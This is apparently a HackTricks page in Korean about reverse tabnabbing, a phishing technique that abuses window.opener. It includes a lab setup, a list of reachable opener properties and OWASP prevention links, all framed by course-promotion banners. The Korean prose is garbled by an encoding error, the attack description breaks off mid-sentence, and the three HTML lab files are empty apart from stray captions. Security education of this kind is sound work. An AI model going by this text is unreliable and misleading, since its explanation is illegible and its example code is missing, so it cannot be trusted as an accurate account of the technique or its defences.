{% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %} # μ„€λͺ… **곡격자**κ°€ **ν”Όν•΄μž**κ°€ 클릭할 **` λ‹€μŒ νŽ˜μ΄μ§€λ₯Ό 폴더에 μƒμ„±ν•˜κ³  `python3 -m http.server`둜 μ›Ή μ„œλ²„λ₯Ό μ‹€ν–‰ν•©λ‹ˆλ‹€.\ 그런 λ‹€μŒ, **μ ‘κ·Ό** `http://127.0.0.1:8000/`vulnerable.html, **클릭**ν•˜μ—¬ **μ›λž˜** **μ›Ήμ‚¬μ΄νŠΈ** **URL**이 **λ³€κ²½**λ˜λŠ” 것을 ν™•μΈν•©λ‹ˆλ‹€. {% code title="vulnerable.html" %} ```markup

Victim Site

Controlled by the attacker ``` {% endcode %} {% code title="malicious.html" %} ```markup ``` {% endcode %} {% code title="malicious_redir.html" %} ```markup

New Malicious Site

``` {% endcode %} ## μ ‘κ·Ό κ°€λŠ₯ν•œ 속성 **ꡐ차 좜처** 접근이 λ°œμƒν•˜λŠ” μ‹œλ‚˜λ¦¬μ˜€μ—μ„œλŠ”, **opener** JavaScript 객체 참쑰둜 μ§€μΉ­λ˜λŠ” **window** JavaScript 클래슀 μΈμŠ€ν„΄μŠ€μ˜ 속성에 λŒ€ν•΄ μ•…μ˜μ μΈ μ‚¬μ΄νŠΈκ°€ μ ‘κ·Όν•  수 μžˆλŠ” 것은 λ‹€μŒκ³Ό κ°™μŠ΅λ‹ˆλ‹€: - **`opener.closed`**: 이 속성은 창이 λ‹«ν˜”λŠ”μ§€ μ—¬λΆ€λ₯Ό ν™•μΈν•˜κΈ° μœ„ν•΄ μ ‘κ·Όλ˜λ©°, λΆˆλ¦¬μ–Έ 값을 λ°˜ν™˜ν•©λ‹ˆλ‹€. - **`opener.frames`**: 이 속성은 ν˜„μž¬ μ°½ λ‚΄μ˜ λͺ¨λ“  iframe μš”μ†Œμ— λŒ€ν•œ 접근을 μ œκ³΅ν•©λ‹ˆλ‹€. - **`opener.length`**: ν˜„μž¬ 창에 μ‘΄μž¬ν•˜λŠ” iframe μš”μ†Œμ˜ 수λ₯Ό λ°˜ν™˜ν•©λ‹ˆλ‹€. - **`opener.opener`**: ν˜„μž¬ 창을 μ—° 창에 λŒ€ν•œ μ°Έμ‘°λ₯Ό 이 속성을 톡해 얻을 수 μžˆμŠ΅λ‹ˆλ‹€. - **`opener.parent`**: 이 속성은 ν˜„μž¬ 창의 λΆ€λͺ¨ 창을 λ°˜ν™˜ν•©λ‹ˆλ‹€. - **`opener.self`**: 이 속성은 ν˜„μž¬ μ°½ μžμ²΄μ— λŒ€ν•œ 접근을 μ œκ³΅ν•©λ‹ˆλ‹€. - **`opener.top`**: 이 속성은 κ°€μž₯ μƒμœ„μ˜ λΈŒλΌμš°μ € 창을 λ°˜ν™˜ν•©λ‹ˆλ‹€. κ·ΈλŸ¬λ‚˜ 도메인이 λ™μΌν•œ 경우, μ•…μ˜μ μΈ μ‚¬μ΄νŠΈλŠ” [**window**](https://developer.mozilla.org/en-US/docs/Web/API/Window) JavaScript 객체 참쑰에 μ˜ν•΄ λ…ΈμΆœλœ λͺ¨λ“  속성에 μ ‘κ·Όν•  수 μžˆμŠ΅λ‹ˆλ‹€. # 예방 예방 μ •λ³΄λŠ” [HTML5 Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/HTML5\_Security\_Cheat\_Sheet.html#tabnabbing)에 λ¬Έμ„œν™”λ˜μ–΄ μžˆμŠ΅λ‹ˆλ‹€. ## μ°Έκ³  λ¬Έν—Œ * [https://owasp.org/www-community/attacks/Reverse_Tabnabbing](https://owasp.org/www-community/attacks/Reverse_Tabnabbing) {% hint style="success" %} Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
Support HackTricks * Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! * **Join the** πŸ’¬ [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.** * **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
{% endhint %}